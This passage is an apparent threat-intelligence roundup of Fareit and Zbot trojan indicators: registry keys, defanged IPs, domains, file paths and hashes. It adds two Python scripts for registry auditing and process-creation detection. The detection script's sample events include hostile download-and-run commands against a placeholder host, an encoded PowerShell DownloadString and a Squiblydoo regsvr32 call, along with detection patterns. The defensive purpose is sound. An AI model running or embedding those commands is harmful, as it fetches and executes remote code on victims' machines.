<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\RICLICY
Value Name: Impersonate
1
Mutexes Occurrences
qazwsxedc 27
3G1S91V5ZA5fB56W 10
NHO9AZB7HDK0WAZMM 10
VRK1AlIXBJDA5U3A 10
VHO9AZB7HDK0WAZMM 10
3HO9AZB7HDK0WAZMM 10
LXCV0IMGIXS0RTA1 2
TXA19EQZP13A6JTR 2
IGBIASAARMOAIZ 2
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
104[.]215[.]148[.]63 15
178[.]62[.]189[.]175 15
46[.]101[.]122[.]232 15
46[.]101[.]56[.]69 15
159[.]203[.]235[.]159 15
66[.]199[.]229[.]251 10
37[.]48[.]104[.]71 10
62[.]75[.]224[.]4 8
85[.]25[.]157[.]147 8
172[.]217[.]197[.]102 5
172[.]217[.]197[.]100/31 3
78[.]46[.]37[.]81 2
78[.]46[.]37[.]158 2
85[.]17[.]117[.]5 2
172[.]217[.]197[.]138/31 2
173[.]227[.]247[.]24/31 1
17[.]173[.]66[.]181 1
184[.]26[.]207[.]175 1
52[.]1[.]79[.]244 1
198[.]58[.]116[.]58 1
67[.]21[.]4[.]136 1
192[.]155[.]92[.]57 1
104[.]115[.]109[.]217 1
216[.]172[.]166[.]106 1
52[.]8[.]196[.]60 1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
europe[.]pool[.]ntp[.]org 15
178[.]62[.]189[.]175 15
159[.]203[.]235[.]159 14
46[.]101[.]56[.]69 14
46[.]101[.]122[.]232 14
r[.]fyykeeptslide[.]net 10
g[.]fyykeeptslide[.]net 6
a[.]siditrax[.]net 2
aa[.]siditrax[.]net 2
cs9[.]wac[.]phicdn[.]net 1
ocsp[.]digicert[.]com 1
self-repair[.]mozilla[.]org 1
www[.]paypalobjects[.]com 1
e3694[.]a[.]akamaiedge[.]net 1
www[.]paypal[.]com 1
s2[.]symcb[.]com 1
sr[.]symcd[.]com 1
ocsp2[.]globalsign[.]com 1
e3691[.]g[.]akamaiedge[.]net 1
e2181[.]b[.]akamaiedge[.]net 1
adfarm-global[.]mplx[.]akadns[.]net 1
paypal[.]d1[.]sc[.]omtrdc[.]net 1
altfarm[.]mediaplex[.]com 1
t[.]paypal[.]com 1
ak1s[.]abmr[.]net 1
*See JSON for more IOCs
Files and or directories created Occurrences
%HOMEPATH%\mslkrru.exe 15
%ProgramData%\msodtyzm.exe 15
%HOMEPATH%\Local Settings\Application Data\uninstall.exe 10
%LOCALAPPDATA%\uninstall.exe 10
%LOCALAPPDATA%\estikk.dll 7
%HOMEPATH%\Local Settings\Application Data\estikk.dll 6
%LOCALAPPDATA%\hetsda.dll 3
%HOMEPATH%\Local Settings\Application Data\hetsda.dll 2
%LOCALAPPDATA%\riclicy.dll 1
%HOMEPATH%\Local Settings\Application Data\riclicy.dll 1
%LOCALAPPDATA%\dicluci.dll 1
%HOMEPATH%\Local Settings\Application Data\dicluci.dll 1
%ProgramData%\228320260 1
%ProgramData%\228318918 1
%ProgramData%\228321118 1
%ProgramData%\228346624 1
%ProgramData%\228318793 1
%ProgramData%\228324129 1
%ProgramData%\228318903 1
%ProgramData%\228320572 1
%ProgramData%\228321617 1
%ProgramData%\228324253 1
%ProgramData%\228370196 1
%ProgramData%\228325533 1
%ProgramData%\228324753 1
*See JSON for more IOCs

File Hashes

0264313435657e607a5edca952c8d6c6b49a067d889ea1b47861eca0c2151bc8 073eca66e8a691e4feb067ea9be6be2f860a37a16c0e4e2d82cbe0d9d6bcf626 10d0eaec661c9ec08bc6b28810666956ac6a76b054de73c6b8de46dec6147de4 1312c2175d4037228e113c1cdb3893484396a4d5c399052543bcd3546908f342 1f1dccb65ab0390f7c11c5d022b19d2a082b7602f09273a7022a9cfaadf703f4 1f22e636178472cd432cf834efadd3f231d868030c640d45bc7b319095f280f9 1f816d531d333287dfd5728657cbb223f891addd28e628fb1cd9bfcfb3216825 2a4dab5fa66737060a150cdab44506efcd2c33651cbe10a383d5a19e41e0ceb2 2cf78102a3bc75a331abf49f6b46fa27546b0a33f4e937e05fed54d53499073c 3a3502534442c75174835e423e8571477269145b153c77b492156a06e9c47f05 3fd16c2e53560649e0b1c79be0e86403887d50588700e66bac1dabbb2b99b753 4fe440cf3713df731f2e7eb210eb70575978821b2862dc7161107d8de197824f 648bbe158a7dafc05b3ac0095ca3eec926970d11054f023c1a4c700069e43883 6e51b6e88a1962263b754210c4eaf76a422575d1b9c8495fa2885f3ccd164a7c 78f418bcdd925f56eabedaae6e092d993a245fde048606a680539cff6bcc54c1 8096baab22457c9fc3087dd93e90a0f4db9be9ecebead32f0f33c965e4b153dc 887cbd08236e1dcdc582789a9fd1122cfe3a2729010a79efd9b48e50d0a290d5 8e8933daed91bf2a385c9c49d572d9102ae959a582e3c6ea81219ef424951f58 99b6a34cb8ad06ca530f7bde87b957c97c1526bb70f0540eba8da58a77b7f319 9b54a9a9fde24c8634c47c950dcb7218d4e1ae1d7c4771f4abd3b92a12e9c686 9d5f6d8d0ed7cf4af9424f57c34d95ba7a59057cc525ac51698d81c85987855a b02eaf95b97c81f56eaddded473b0c66668ff4f55bb84c929c28af1b502b3b7d b8dd63abc6d1dee062cf5f5b68e8e91f748e29c354e19b66d119e04849f51083 bdf44a59073f52b5b4bada6afbeccd9410ce8ca0a46441149b66d4b97b305572 d90afab18a64702ce68aae194c7e73833ab8329e8e9f89013b0195b13123b2ec
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK




Win.Trojan.Zbot-8013884-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 32 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE
Value Name: DisableSR
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
6
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 2c8e14e
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: *c8e14e
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 2c8e14ef
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: *c8e14ef
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BITS
Value Name: Start
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WERSVC
Value Name: Start
6
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Value Name: Blob
6
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE
Value Name: Blob
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: {32382BC4-48A5-6DE8-F0EE-B8109DEC3228}
1
<HKCR>\CLSID\{336F6FFD-1E87-0F7A-E3F2-4116F584449F} 1
<HKCR>\CLSID\{336F6FFD-1E87-0F7A-E3F2-4116F584449F}\1 1
<HKCR>\CLSID\{336F6FFD-1E87-0F7A-E3F2-4116F584449F}\2 1
<HKCR>\CLSID\{336F6FFD-1E87-0F7A-E3F2-4116F584449F} 1
<HKCR>\CLSID\{336F6FFD-1E87-0F7A-E3F2-4116F584449F}
Value Name: 2
1
<HKCR>\CLSID\{336F6FFD-1E87-0F7A-E3F2-4116F584449F}
Value Name: 1
1
<HKCR>\CLSID\{336F6FFD-1E87-0F7A-E3F2-4116F584449F}
Value Name: 0
1
Mutexes Occurrences
qazwsxedc 16
Global\<random guid> 7
{D40826B6-6DEA-3FD2-F3F9-B38D55A50621} 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
74[.]220[.]199[.]6 6
23[.]227[.]38[.]32 6
23[.]20[.]239[.]12 6
184[.]168[.]131[.]241 6
184[.]106[.]112[.]172 6
198[.]71[.]233[.]163 6
173[.]201[.]222[.]106 6
198[.]57[.]151[.]37 6
184[.]106[.]55[.]91 6
199[.]34[.]229[.]100 6
46[.]32[.]240[.]33 6
107[.]180[.]55[.]15 6
66[.]34[.]140[.]40 6
173[.]201[.]244[.]70 6
94[.]73[.]147[.]76 6
107[.]180[.]44[.]157 6
73[.]84[.]65[.]58 6
111[.]223[.]233[.]27 6
154[.]206[.]118[.]131 6
13[.]235[.]208[.]245 6
103[.]37[.]9[.]144 6
216[.]239[.]38[.]21 3
50[.]63[.]202[.]49 3
50[.]63[.]202[.]34 3
216[.]239[.]34[.]21 2
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
www[.]hugedomains[.]com 6
myexternalip[.]com 6
ip-addr[.]es 6
be-practical[.]com 6
blackrabbitartdesign[.]com 6
brascoder[.]com 6
bullsfx[.]com 6
beijosnaboca[.]com 6
biologicalhealthservices[.]com[.]au 6
byourverynature[.]com 6
cafghanc[.]com 6
asrparts[.]com 6
brycedoersam[.]com 6
apmanages[.]com 6
begginsreferralnetwork[.]com 6
bodychargenutrition[.]com 6
babytravelblog[.]com 6
bugnoutapreppersparadise[.]com 6
appeum[.]com 6
buycarbontubes[.]com 6
aslikarabulut[.]com 6
bowlsshirts[.]com 6
c21brn[.]com 6
avalonmakeupartists[.]com 6
buyhusqvarnamowers[.]com 6
*See JSON for more IOCs
Files and or directories created Occurrences
\4930e6be\4930e6be.exe 6
%APPDATA%\4930e6be.exe 6
%HOMEPATH%\Start Menu\Programs\Startup\4930e6be.exe 6
\2c8e14ef 6
\2c8e14ef\2c8e14ef.exe 6
%APPDATA%\2c8e14ef.exe 6
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\2c8e14ef.exe 6
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startupx\system.pif 5
%TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt 5
%HOMEPATH%\Start Menu\Programs\Startupx\system.pif 4
%TEMP%\bwdbyp.ifq 4
%TEMP%\mlgm.mcs 4
%SystemRoot%\gss.cbr 3
%SystemRoot%\psj.flp 3
%System32%\drivers\etc\hosts 1
%TEMP%\9D3A.dmp 1
%System32%\Tasks\{336F6FFD-1E87-0F7A-E3F2-4116F584449F} 1
%SystemRoot%\Tasks\{B1848E98-8BF6-84BE-2D84-8DA4C5726179}.job 1
%TEMP%\A02CE.dmp 1
%APPDATA%\RhehnPcU 1
%APPDATA%\RhehnPcU\PzWtYTmF 1
%APPDATA%\RhehnPcU\PzWtYTmF\rEQTeLRe 1
%APPDATA%\RhehnPcU\PzWtYTmF\rEQTeLRe\QlZPaxxwp.exe 1
%APPDATA%\EfXYzYVl\RxdBjjMs\nJMxbUsW\vORDaycmX.exe 1
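The Fareit and Zbot registry tables above show the same pattern: UAC policy (EnableLUA), the Start values of the Security Center, Defender, firewall, Windows Update, BITS and WER services, System Restore (DisableSR), and autorun locations that most baselines ignore (Policies\Explorer\Run and the Windows NT\CurrentVersion\Windows "Load" value). The script below, an added example and not Talos tooling, parses a `reg export` (.reg) file and flags those changes. The page lists the keys the samples touched but not the values written; the values treated as tampering here (EnableLUA=0, Start=4 for the listed services, DisableSR=1, any Policies\Explorer\Run entry, a non-empty Load value) are this example's assumptions. The sample export is constructed, not a capture from an infected host, and the user-profile path in it is made up.

```python
"""Audit a .reg export for the hardening tampering and unusual persistence
locations seen in the Fareit and Zbot registry tables.

Added example, not Talos tooling. The "bad" values checked below are this
example's assumptions; the sample export is constructed.
"""
import re
from typing import Dict, List

HIVE_ALIASES = {"HKEY_LOCAL_MACHINE": "HKLM", "HKEY_CURRENT_USER": "HKCU",
                "HKEY_CLASSES_ROOT": "HKCR", "HKEY_USERS": "HKU"}
# Services the samples above set to Start=4 (SERVICE_DISABLED).
SECURITY_SERVICES = {"WSCSVC", "WINDEFEND", "MPSSVC", "WUAUSERV", "BITS", "WERSVC"}
SERVICE_DISABLED = 4
SERVICE_KEY_RE = re.compile(r"HKLM\\SYSTEM\\(?:CURRENT)?CONTROLSET\d{0,3}\\SERVICES\\([^\\]+)")
VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')

# Constructed export (not from a real host): UAC off, two security services
# disabled, one unrelated service disabled, policy and Load autoruns, System
# Restore off, and Windows Update left at its normal Start=2.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDefend]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Spooler]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"1081297374"="C:\\ProgramData\\msodtyzm.exe"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"Load"="C:\\Users\\victim\\mslkrru.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wuauserv]
"Start"=dword:00000002
"""


def parse_reg(text: str) -> Dict[str, Dict[str, object]]:
    """Minimal REGEDIT5 parser: [key] sections with "name"=dword:.. or
    "name"=".." lines. Keys are upper-cased and hives shortened (HKLM, HKCU)
    so they compare directly with the notation used in the tables above."""
    reg: Dict[str, Dict[str, object]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            hive, _, rest = line[1:-1].partition("\\")
            current = (HIVE_ALIASES.get(hive.upper(), hive.upper()) + "\\" + rest).upper()
            reg.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if current is None or not m:
            continue
        name = m.group(1) if m.group(1) is not None else ""  # "@" is the default value
        rhs = m.group(2)
        if rhs.lower().startswith("dword:"):
            value: object = int(rhs[6:], 16)
        elif rhs.startswith('"') and rhs.endswith('"'):
            value = rhs[1:-1].replace('\\\\', '\\').replace('\\"', '"')
        else:
            value = rhs  # hex:/binary values kept raw
        reg[current][name.upper()] = value
    return reg


def audit(reg: Dict[str, Dict[str, object]]) -> List[str]:
    """Return one finding per tampered key or suspicious autorun entry."""
    findings: List[str] = []
    for key, values in reg.items():
        if key.endswith(r"\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM") and values.get("ENABLELUA") == 0:
            findings.append("UAC disabled: EnableLUA=0")
        m = SERVICE_KEY_RE.fullmatch(key)
        if m and m.group(1) in SECURITY_SERVICES and values.get("START") == SERVICE_DISABLED:
            findings.append(f"security service disabled: {m.group(1)} Start=4")
        if key.endswith(r"\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE") and values.get("DISABLESR") == 1:
            findings.append("System Restore disabled: DisableSR=1")
        if key.endswith(r"\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN"):
            for name, val in values.items():
                findings.append(f"policy autorun entry: {name} -> {val}")
        if key.endswith(r"\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS") and values.get("LOAD"):
            findings.append(f"legacy Load autorun: {values['LOAD']}")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_reg(SAMPLE_EXPORT)):
        print(finding)
```

On a live host, `reg export HKLM hklm.reg` and `reg export HKCU hkcu.reg` produce input in this format. The Spooler and wuauserv entries in the sample are there to show that only the services the tables name are flagged; a disabled print spooler is a change-management question, not a Fareit indicator.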

File Hashes

01f24045d18c966d195d0934ac6bc801652a5908a9ef50124c0557f6d03d42c3 058051ccc05ed076f17535e744f385290eda9c2e0912ed7c460e5b571b3e26dc 0649a007c9e7e7abc08fcfa53cfbc0a11c3119792b04d2ff6a47f8f53cdc5514 07905ece0c4747aad1bf4b7f11693e319140a4e55f1b40308209f4ccf3c16dfb 0b9297a648aba6ee27b8a96cc95974be328547141e1b5a3e13e544f71bc045e0 0e475d4c0f6ff5e453668f962c6a7d78d218582a46d3d2f7ab36b221face4631 115dd57d8c7887820eba732e628879f34693791da1cc8f4b270ef954e8a56b2b 2240fb081176a4811088f5818d0b5d6a60a2ffd64a8202fdd46b4e05f694ac2d 258b78459aad9222ce31fd3c6a7fa2fe202c0a29e4299b7f0ff9be373ef72670 2760e4f5c5119988b6c83907da6a3cf60e62c2425456ebf1e06893a00c04b91b 29114a3a6b05e119245d93373f8776a086a9018016238a3300ed93700d7f2f32 29561a21de4d716de129ff67f4504feee5232e932dc7925d8acf2fd6220b7ba6 2e8882116694efbb6b57355f7f3e6b79b77cfbae42b5204b3d3172497f7e327d 356b7cfcc87425f08c9ad492d272b5ac6e0476389193c20ebd37cf95e1215825 3988dc9a3f05c928110f69bd750b6d6ac7fa233e6ef072463f82fea877a0ad7c 476ce28be8b7576a3b0576e7dd8f90f2aa1cfc59ad90adb5abf14a9d5d866b84 498438a69aa744934cd33f6219709b3fb1531e3e89e95cef805f494ba8be938b 4de13fa0580a6f7f315652cfe448493336db4cbcbcc31fa15caf5016ce11aa72 4ea79444f67c2c5ef753e785887a9181ae17eb984c7f37a3113cad6a2b2e6ccd 4fbf3416adf96620028b3f92f661d24708aff0c83651868dddbbddae11110b9d 5c0c7d1e7e52685b82c1d170368db66fbfbe06ab3e05c7a8243d9bad5500a64c 5d2659b94c16fc1db20e20a1110426bc3a5cf29904cfe49ac381de573c8d6135 5e15c7ef36f861bd967c4b7cf7b4476d37be287e3b1e18cc41168810b9e36f3f 60d3892006ae9dece5a967e4023c664437fff4d3662b47a01738cebda1b1446d 67187b9ebc578ae12c06cddff756160d741eafd53440efd6756c646e4d9e7594
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK




Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
Dealply adware detected - (5183)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
CVE-2019-0708 detected - (4194)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a use-after-free in the kernel-mode Remote Desktop Protocol (RDP) driver that can be triggered by sending a specially crafted RDP request. Because it is reachable before authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Excessively long PowerShell command detected - (2660)
A PowerShell command with a very long command-line argument, which may indicate an obfuscated script, has been detected. PowerShell is an extensible Windows scripting language present on all supported versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
Process hollowing detected - (1276)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a legitimate process is started in a suspended state and its original executable image is unmapped from memory. The parent then unpacks its obfuscated or encrypted payload into that address space in place of the original image, fixes up the entry point and resumes the thread, so the malicious code runs under the name and on-disk image of the legitimate process.
Installcore adware detected - (253)
InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Kovter injection detected - (141)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Squiblydoo application whitelist bypass attempt detected. - (136)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe, a signed Microsoft binary, to load scrobj.dll and execute a COM scriptlet (.sct) hosted on an attacker-controlled server.
Gamarue malware detected - (79)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
A Microsoft Office process has started a windows utility. - (41)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many different malware campaigns and families.
IcedID malware detected - (37)
IcedID is a banking Trojan. It uses both web browser injection and browser redirection to steal banking and/or other financial credentials and data. The features and sophistication of IcedID demonstrate the malware author's knowledge and technical skill for this kind of fraud, and suggest the authors have previous experience creating banking Trojans. IcedID has been observed being installed by Emotet or Ursnif. Systems infected with IcedID should also be scanned for additional malware infections.
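Three of the behaviours above (an excessively long or encoded PowerShell command line, a Squiblydoo regsvr32 invocation, and an Office process starting a Windows utility) are visible in ordinary process-creation telemetry. The script below is an added example of that detection logic, not Cisco's or Talos' code: it evaluates Sysmon-style records (ParentImage, Image, CommandLine) against the three rules and decodes `-EncodedCommand` payloads so the analyst sees the real command. The events are constructed for the demonstration; the URLs use the reserved `.invalid` domain and are not indicators from this roundup, and the 1000-character threshold and the process lists are this example's assumptions, to be tuned against your own baseline.

```python
"""Process-creation detections for three Exploit Prevention behaviours:
Office spawning a utility, long or encoded PowerShell, and Squiblydoo.

Added example, not Cisco/Talos code. Events are constructed Sysmon-style
records; .invalid URLs are placeholders, not real indicators.
"""
import base64
import re
from typing import Dict, List, Optional, Tuple

# Assumed process lists and threshold; tune against your own baseline.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
UTILITY_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                    "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe"}
LONG_CMDLINE_THRESHOLD = 1000

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENCODED_RE = re.compile(r"(?<!\S)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# regsvr32 /i:<url> with scrobj.dll is the Squiblydoo pattern.
SQUIBLYDOO_RE = re.compile(r"/i:\s*https?://\S+", re.IGNORECASE)

# Constructed sample events (not real telemetry).
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/a')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -c " + "$a=[char]0x41;$b+=$a;" * 60},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://stage.example.invalid/x.sct scrobj.dll"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (Base64 of UTF-16LE) or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(event: Dict[str, str]) -> List[Dict[str, str]]:
    """Evaluate one process-creation event; return zero or more findings."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    cmd = event["CommandLine"]
    findings: List[Dict[str, str]] = []
    if parent in OFFICE_PARENTS and image in UTILITY_CHILDREN:
        findings.append({"rule": "office_spawned_utility", "detail": f"{parent} -> {image}"})
    if image in {"powershell.exe", "pwsh.exe"}:
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append({"rule": "encoded_powershell", "detail": decoded[:80]})
        if len(cmd) > LONG_CMDLINE_THRESHOLD:
            findings.append({"rule": "long_powershell_cmdline", "detail": f"{len(cmd)} chars"})
    if image == "regsvr32.exe" and "scrobj.dll" in cmd.lower():
        m = SQUIBLYDOO_RE.search(cmd)
        if m:
            findings.append({"rule": "squiblydoo_regsvr32", "detail": m.group(0)})
    return findings


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, Dict[str, str]]]:
    return [(i, f) for i, e in enumerate(events) for f in analyse(e)]


if __name__ == "__main__":
    for index, finding in scan(SAMPLE_EVENTS):
        print(index, finding["rule"], finding["detail"])
```

The first event fires twice (Office parent and encoded PowerShell), which is the combination the descriptions above call extremely suspicious; the decoded payload is what should go into the alert, since the Base64 blob alone tells the analyst nothing. The notepad event is a control and produces no finding.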
